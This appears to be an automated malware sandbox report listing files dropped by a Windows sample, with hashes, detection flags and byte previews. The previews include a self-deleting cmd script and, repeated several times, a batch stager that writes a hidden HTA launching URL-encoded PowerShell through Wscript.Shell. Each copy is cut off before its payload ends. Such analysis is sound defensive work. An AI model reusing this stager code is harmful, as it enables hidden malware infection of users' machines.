                                                                                                                                                                                                                                                    MD5:69E09CBF7B56454D9FF5686CD8FE492F
                                                                                                                                                                                                                                                    SHA1:5A1993097306BF2AC08F4BC457DA97C797669989
                                                                                                                                                                                                                                                    SHA-256:7BD2D52A3DBD6ADFC7538319829BD471C1C9140709D8083A80A860EC2DEB93E1
                                                                                                                                                                                                                                                    SHA-512:A064F8E89FDEC590365B19B3265A69F2E764DAC4B3F1197A151F5BE9DC49E07A0AAD8F9ACACA3B2F2ACA7CAF403A744E46FEC84FE62E3D0FF99CE5DBC1D0CC3E
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................01...........@..........................`1.....*"2...@.................................W...k...........................(.1...............................1..................................................... . ............................@....rsrc...............................@....idata ............................@...ykgekexw.p*......f*.................@...prmmqeqz..... 1.......0.............@....taggant.0...01.."....1.............@...........................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\7ZSfx000.cmd

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe
                                                                                                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):214
                                                                                                                                                                                                                                                    Entropy (8bit):4.91225139967521
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:mRoiosZ23fiVAZMD2UsZ23fiVAj0WiosZ23fS3:mRo2cKiHcKijL2c8
                                                                                                                                                                                                                                                    MD5:E0BCF606AE47E2AA1F71D332C85790DD
                                                                                                                                                                                                                                                    SHA1:852A93B50FBBC30DA5ED4070D26F3805E1EC5C88
                                                                                                                                                                                                                                                    SHA-256:BA15A54291A28DE17DE5BBC0E560593CF4B03D6A2CB9A9BA9A1F9E168C7CB0BF
                                                                                                                                                                                                                                                    SHA-512:01A2DCA624C88B529E48C04824FDA355A456F5677B284DE99A2815CBE03E060811D22E3B544061A45F39A210115C41CADF7F46B3A5FE1F0FA007E675E54DC361
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview::Repeat..del "C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe"..if exist "C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe" goto Repeat..del "C:\Users\user\AppData\Local\Temp\7ZSfx000.cmd"..

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\AutoIt3_x64.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe
                                                                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1071704
                                                                                                                                                                                                                                                    Entropy (8bit):6.432838117683661
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:5TC6Rb6qu1PyC+NRLtpScpzbtT7pyOolKL8Sq/jrc5xaNIBB:5+6AqSPyC+NltpScpzbtvpJoMQSq/jre
                                                                                                                                                                                                                                                    MD5:8FA52F316C393496F272357191DB6DEB
                                                                                                                                                                                                                                                    SHA1:B1FF3D48A3946CA7786A84E4A832617CD66FA3B9
                                                                                                                                                                                                                                                    SHA-256:92C6531A09180FAE8B2AAE7384B4CEA9986762F0C271B35DA09B4D0E733F9F45
                                                                                                                                                                                                                                                    SHA-512:C81DA97D6980D6A5AA612070477950A1386239BB919E762F7870BCCD459A03DA48F8F169910B91F3827C6CFEF50471569C9E0C9FF2CEB897904D81840C087D51
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......}0tp9Q.#9Q.#9Q.#...#,Q.#...#.Q.#...#.Q.#...#8Q.#k9.".Q.#k9."(Q.#k9."1Q.#0).#1Q.#0).#8Q.#0).#.Q.#9Q.#.S.#.8."hQ.#.8."8Q.#.8.#8Q.#9Q.#;Q.#.8."8Q.#Rich9Q.#........PE..d...3.(c.........."......H...*.......Z.........@.....................................q....`...@...............@..............................l..|.......P....P...o...4..X&......|... .......................p...(...@................`..8............................text...<G.......H.................. ..`.rdata..|B...`...D...L..............@..@.data... ........P..................@....pdata...o...P...p..................@..@.rsrc...P............P..............@..@.reloc..|............(..............@..B................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\database.pdb

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):241157
                                                                                                                                                                                                                                                    Entropy (8bit):7.950933531075931
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3072:YTgt6LRJX4InmmSun3jZo/6g7SvQofPBwAOYrr/HNc8QuJuGfg1Fb4qA/:YztJo7yHgevQ7bAjtcrVCgbbQ
                                                                                                                                                                                                                                                    MD5:C5D3C2BA6AE7DCA00253E4ECFFBA5FFF
                                                                                                                                                                                                                                                    SHA1:A4FE66A2BC0A9C765D686B79EBB32B9E1FF28914
                                                                                                                                                                                                                                                    SHA-256:D3310ED7739ABF58A57B91D408B554C617944EF19866ED402890D3FB6BF8E9D8
                                                                                                                                                                                                                                                    SHA-512:F6104A069C931DA6E36C0A0823EA3CDE0BE741C0C4794B307E1CA6A33AD4B32B55CB4DD7275DE54AF4E636454E82488ECCD08F97422E036EDE500D2DD9BB5158
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:......b........7......M..I..Tu.'.dcfCN.~n..z+.....{.x.............P...a. 1..`.H.M...(.R.1.{.{L.p..Cvk.....]o.N....H...}T.D..i..9..!S.0$...I....M..<..i.'@".>WnZ=...c......*...F..6Q...Z.LR.$T*.."...6.5.8...?...{iI3.<..N.z.ik).F_....hd{...0&s,0p.lV.8...c`...?...Rr...S.G...<.0[oh...{..wj...4.T.6.\....a).d.,..C...w.e.3.....\..\.+..K.4.Z.N..4Q...m....v:..drh..=u..'....(.v..k.....8...t~...2%..y)s....SgK=..IJ...1....2e.7.zL....I/d..?....p....X.N...N...p.e..^RJ...D.Y......z..+.w.].5.........]..T..y......K./t....:...........;-..M.#.......,<..=..v/%.....I.a..6.8}R.l{.J..{..Ow....un.W?.wW:Y..F.4y.n.......^...3q....i=....<.."i.>.`V.3...3.. ...5.....?.t.."#..W.....e^.`....O...........j..+...^.GAo.b{.....5.o.<......<8D.../.zZ.6......h..h..v.3....>...o.G../-.......5a|.............o.R._..$.5s..[&..).. ...0'...i..........Q.......;...........9......C..t.+K*9c|Y......'..'...!....t .|9...m.. ....4Ds.|.&.B../=Sr/w.e..1..5.;.0.}...u...........f..[....

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\main.pdb

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe
                                                                                                                                                                                                                                                    File Type:MSVC program database ver 7.00, 4096*41 bytes
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):167936
                                                                                                                                                                                                                                                    Entropy (8bit):2.8893957788892175
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:1536:kRI0pmdcJVseJwFLGzrNCpZCu6VIYfK+QLBqArs+/9T:kR12cj5JWKzxCpb6VIdtLIQ
                                                                                                                                                                                                                                                    MD5:86F1542816FEA380454305D44F8D0C68
                                                                                                                                                                                                                                                    SHA1:924EF5C867FCCC65DD16920780F80AAB4540CEAA
                                                                                                                                                                                                                                                    SHA-256:E818792CBF2985B031190ACA717C981F6D12B4A6150347215284466AE7F012F5
                                                                                                                                                                                                                                                    SHA-512:68F8471F12E24460C1F3F1D2E9C5F6D6252CAEEFB7F959B050CF84F806432EB7505938A583552D62B0DED969B4A930A808AAF350197835481FCC96C566BC9517
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:Microsoft C/C++ MSF 7.00...DS...........)...........'...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\msvcp140.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):439208
                                                                                                                                                                                                                                                    Entropy (8bit):6.6510194969003855
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12288:IdyX+9Tk5fb+5J56HgGwKz2zRThUgiW6QR7t5s03Ooc8dHkC2es+Fpyd:LX+9TkR+5J56AjKz2VA03Ooc8dHkC2eu
                                                                                                                                                                                                                                                    MD5:FDD04DBBCF321EEE5F4DD67266F476B0
                                                                                                                                                                                                                                                    SHA1:65FFDFE2664A29A41FCF5039229CCECAD5B825B9
                                                                                                                                                                                                                                                    SHA-256:21570BCB7A77E856F3113235D2B05B2B328D4BB71B4FD9CA4D46D99ADAC80794
                                                                                                                                                                                                                                                    SHA-512:04CFC3097FBCE6EE1B7BAC7BD63C3CFFE7DCA16F0EC9CD8FE657D8B7EBD06DCBA272FF472F98C6385C3CFB9B1AC3F47BE8CA6D3EA80AB4AEED44A0E2CE3185DD
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......P..%.d.v.d.v.d.v...w.d.v..~v.d.v.d.v.d.vv..w.d.vv..w.d.vv..w.d.vv..w.d.vv..w.d.vv..v.d.vv..w.d.vRich.d.v................PE..L..."............."!.........~...............0......................................h.....@A.........................\......Hc...........................'......$7..hX..T............................W..@............`..@............................text............................... ..`.data...L(...0....... ..............@....idata.......`.......8..............@..@.rsrc................P..............@..@.reloc..$7.......8...T..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\setup.tar.gz

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe
                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):22774
                                                                                                                                                                                                                                                    Entropy (8bit):7.993057976798303
                                                                                                                                                                                                                                                    Encrypted:true
                                                                                                                                                                                                                                                    SSDEEP:384:Mm4XLenCmw+655WGYKTxOMJX3aAbZN0YomyPtITefbev5nmY+um28g6DQwVmB/1Q:nFnCmxcnYkOMJntbZN0FmyP2yjeVgDg8
                                                                                                                                                                                                                                                    MD5:FA02AA9830A046974C7AFE1D1BCC24AC
                                                                                                                                                                                                                                                    SHA1:6CE8D5215BF1F3716AB8051EDABE1CB5D7F8BF4B
                                                                                                                                                                                                                                                    SHA-256:84AB6BBCDE2711DBBE2D23BD4BC98D97336EC193AC0501925C90C99C77801BFC
                                                                                                                                                                                                                                                    SHA-512:22FB3B02EA87BECD33369414A87F630618C6571B02D51F61896E9E7716814276A424D54B1C622AA4868E5AECD5069A2870E7B3DDD4610EC4DD2BCB6E8E642999
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:.HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.M....k:\.....K.).9.....|.cSQ.........wO.O..-..zz..eD..b..@..D..7.H......[...f.j=&.?..#..M.a.#|.y&.*m.W(............y...............Z...:?..Z...:?.kC.R......%x....}...q..U-...(....%....V..?p.h......<.Y....w^.........S..E.wX0..+...,9F.T.|W4.-D.,...6..^....U,...=m..]S.:R..:..Jq..m....4.ix...=..t.&....l..=......y.jp...............Z....;..Z...w>.m.......w8.5...x...(nU.j....06.f".].X.:..)...].H.}...x...xX..W.P...=.g.e..,'....f-.._.EO.S.3....OLb.Zg...]....E. ..U..Z.....*.St.R...&XV*....;.)..../..:.n7r.m.X......G...K..V.....DNC.G...QQZ...M..&.,....b..0..NH.d.h...Yv..@..L......m3!.0.j.2.Tz...9...^..H2Y{._.....>.bm.c.:.j.V{.a..8.h).. .W.F.g..Q....q..............u.%?L.U.mM....=C.q5h....:..o..Y.&.Tq.2.t .....d..B.~..M.....w6?T..(....C....._}..p.b.*l.1....u.x.([p.]|s..^.]BzgHwD.6..~.1...}.Lgl7(C.6..X.ob..T...MH.5J.P.H."...E.Q.nu....X.i.,@.=.Mc.Rk.....n.....k`~Y..

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\7ZipSfx.000\ucrtbase.dll

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027566001\522bb7a019.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1170904
                                                                                                                                                                                                                                                    Entropy (8bit):6.805826320677691
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24576:+WiAihjcDBXUw9y079gzyVFExlfz+pq12S5qyrmcvIZPoy4spcFOo:NiAihjmXfgzyVFEWc2SEyApcco
                                                                                                                                                                                                                                                    MD5:126FB99E7037B6A56A14D701FD27178B
                                                                                                                                                                                                                                                    SHA1:0969F27C4A0D8270C34EDB342510DE4F388752CD
                                                                                                                                                                                                                                                    SHA-256:10F8F24AA678DB8E38E6917748C52BBCD219161B9A07286D6F8093AB1D0318FA
                                                                                                                                                                                                                                                    SHA-512:D787A9530BCE036D405988770621B6F15162347A892506CE637839AC83AC6C23001DC5B2292AFD652E0804BD327A7536D5F1B92412697C3BE335A03133D5FE17
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........2..\...\...\......\...]...\.......\...\...\..._...\...Y...\...R...\...X...\.......\...^...\.Rich..\.........................PE..L.................!................0................................................b....@A................................t".......@...................!...P......P...T...........................p...@............ ..p............................text...P........................... ..`.data...<...........................@....idata....... ......................@..@.rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\C0C9.tmp\C0CA.tmp\C0CB.bat

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    File Type:ISO-8859 text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2809
                                                                                                                                                                                                                                                    Entropy (8bit):5.077442886756323
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:orouU88IHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQaO:o0u4kGurX16HA3Ux6D9Dw1fQGObEQaO
                                                                                                                                                                                                                                                    MD5:7C416B523DCA615B2B1347B6DE083B6B
                                                                                                                                                                                                                                                    SHA1:6DF5A1C2BCA1DE7ACD05CD8B757187E7E4A311FA
                                                                                                                                                                                                                                                    SHA-256:A74F56F1396CD1533BBB1171E8B01F6418CC93D0634AA79399278664BE1924CE
                                                                                                                                                                                                                                                    SHA-512:F4CD5D3DBCB0D048B177C6F33D5D3569C6A18BD1F6E4A58A92D3724ADCB9F8802D9FCD827C5D8F6DFEE78BD3AEA84EA184F62EAB0C94D702E41F14D03BC93235
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. if %errorlevel% neq 0 exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%20%%48%%69%%64%%

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\C1B3.tmp\C1B4.tmp\C1B5.bat

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    File Type:ISO-8859 text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2809
                                                                                                                                                                                                                                                    Entropy (8bit):5.077442886756323
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:orouU88IHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQaO:o0u4kGurX16HA3Ux6D9Dw1fQGObEQaO
                                                                                                                                                                                                                                                    MD5:7C416B523DCA615B2B1347B6DE083B6B
                                                                                                                                                                                                                                                    SHA1:6DF5A1C2BCA1DE7ACD05CD8B757187E7E4A311FA
                                                                                                                                                                                                                                                    SHA-256:A74F56F1396CD1533BBB1171E8B01F6418CC93D0634AA79399278664BE1924CE
                                                                                                                                                                                                                                                    SHA-512:F4CD5D3DBCB0D048B177C6F33D5D3569C6A18BD1F6E4A58A92D3724ADCB9F8802D9FCD827C5D8F6DFEE78BD3AEA84EA184F62EAB0C94D702E41F14D03BC93235
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. if %errorlevel% neq 0 exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%20%%48%%69%%64%%

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\DX0TGIT2LZWIIEDZ8Y3A15R.exe

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\Desktop\EdYEXasNiR.exe
                                                                                                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):5206016
                                                                                                                                                                                                                                                    Entropy (8bit):5.564218011157211
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:49152:/5dL6ZDdy3R5it8PYXdjmJU7VVZr4JIMappEGc:/bgDdy3REt8PYXdyJqVVZEJIzH
                                                                                                                                                                                                                                                    MD5:3F6AB8A7E543EE65455B7D923402EF58
                                                                                                                                                                                                                                                    SHA1:192AA1F86EEB4B39E057A49FB9A2EE7AF94D1669
                                                                                                                                                                                                                                                    SHA-256:07C9218CCBA3CEE93DEDDB69C6AFCCD55AE878B07594BB00343D9C3331EB95D7
                                                                                                                                                                                                                                                    SHA-512:4B8E3B19CD5D238959B19E8AD4618C6FE113058A059281CDA238E20E544DEFA93DC11EAAE5829937E6BD6E4DF19EC97EAF22DFB9AEEA3955986E26A7381040D0
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(........O...........@...........................O.......O...@.................................M.$.a.....$.......................$..................................................................................... . ..$.......$.................@....rsrc.........$.......$.............@....idata ......$.......$.............@...losjkhko..*...$...*...$.............@...ybfttvsi.....pO......JO.............@....taggant.0....O.."...NO.............@...........................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\F7C7.tmp\F7C8.tmp\F7C9.bat

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    File Type:ISO-8859 text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2809
                                                                                                                                                                                                                                                    Entropy (8bit):5.077442886756323
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:orouU88IHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQaO:o0u4kGurX16HA3Ux6D9Dw1fQGObEQaO
                                                                                                                                                                                                                                                    MD5:7C416B523DCA615B2B1347B6DE083B6B
                                                                                                                                                                                                                                                    SHA1:6DF5A1C2BCA1DE7ACD05CD8B757187E7E4A311FA
                                                                                                                                                                                                                                                    SHA-256:A74F56F1396CD1533BBB1171E8B01F6418CC93D0634AA79399278664BE1924CE
                                                                                                                                                                                                                                                    SHA-512:F4CD5D3DBCB0D048B177C6F33D5D3569C6A18BD1F6E4A58A92D3724ADCB9F8802D9FCD827C5D8F6DFEE78BD3AEA84EA184F62EAB0C94D702E41F14D03BC93235
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. if %errorlevel% neq 0 exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%20%%48%%69%%64%%

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\F9BB.tmp\F9BC.tmp\F9BD.bat

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027516001\f3d6f9fcfe.exe
                                                                                                                                                                                                                                                    File Type:ISO-8859 text, with very long lines (798), with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2809
                                                                                                                                                                                                                                                    Entropy (8bit):5.077442886756323
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:orouU88IHGurrr4KpT/E/616HA3Ux6D9DwAIfa1Otzt47GDgc0XysSUbEQaO:o0u4kGurX16HA3Ux6D9Dw1fQGObEQaO
                                                                                                                                                                                                                                                    MD5:7C416B523DCA615B2B1347B6DE083B6B
                                                                                                                                                                                                                                                    SHA1:6DF5A1C2BCA1DE7ACD05CD8B757187E7E4A311FA
                                                                                                                                                                                                                                                    SHA-256:A74F56F1396CD1533BBB1171E8B01F6418CC93D0634AA79399278664BE1924CE
                                                                                                                                                                                                                                                    SHA-512:F4CD5D3DBCB0D048B177C6F33D5D3569C6A18BD1F6E4A58A92D3724ADCB9F8802D9FCD827C5D8F6DFEE78BD3AEA84EA184F62EAB0C94D702E41F14D03BC93235
                                                                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:@shift /0..?.?@echo off..if "%~1" == "" (start "" /min "%comspec%" /c "%~f0" any_word & exit /b)....set "filePath=%SystemDrive%\Temp"..if not exist "%filePath%" (.. mkdir "%filePath%".. if %errorlevel% neq 0 exit /b..)....for /f "tokens=*" %%i in ('powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"') do set "randomName=%%i"....set "fileName=%randomName%.txt"..set "gifFile=%randomName%.gif"..set "htaFile=%randomName%.hta"....if exist "%filePath%\%fileName%" del "%filePath%\%fileName%"..if exist "%filePath%\%gifFile%" del "%filePath%\%gifFile%"..if exist "%filePath%\%htaFile%" del "%filePath%\%htaFile%"....(.. echo ^<script^>.. echo try {.. echo moveTo(-100, -100^);.. echo resizeTo(0, 0^);.. echo var a = new ActiveXObject('Wscript.Shell'^);.. echo var script = decodeURIComponent("%%50%%6f%%77%%65%%72%%53%%68%%65%%6c%%6c%%20%%2d%%57%%69%%6e%%64%%6f%%77%%53%%74%%79%%6c%%65%%20%%48%%69%%64%%

                                                                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\_MEI75642\Include\pyconfig.h

                                                                                                                                                                                                                                                    Download File
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:C source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):21965
                                                                                                                                                                                                                                                    Entropy (8bit):5.377448864783034
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:rGbGMpOukkk8/McYuw8BsRhpuDaBUMiBaZdVsdgh3nIog:rGbGMph9TSNaaZIaZX1Iog
                                                                                                                                                                                                                                                    MD5:12E553CC7A522452A52C4B43EF2D06FA
                                                                                                                                                                                                                                                    SHA1:D84581A632CF5D0D124720DE0F679D52BAB49D16
                                                                                                                                                                                                                                                    SHA-256:0655F5B86BE27C8600AB9350F6A74389ABE37D0BDC9A533B90A9BD77F068C974
                                                                                                                                                                                                                                                    SHA-512:0C01D77E0CC9433F5E69D84E78A4B814EEE48A778512D1CE1919DCCD1F29627C0B661BCD1CD262F6FC9F9861DCFE05F50DA1107E50E0B0E92459301F64486CE7
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
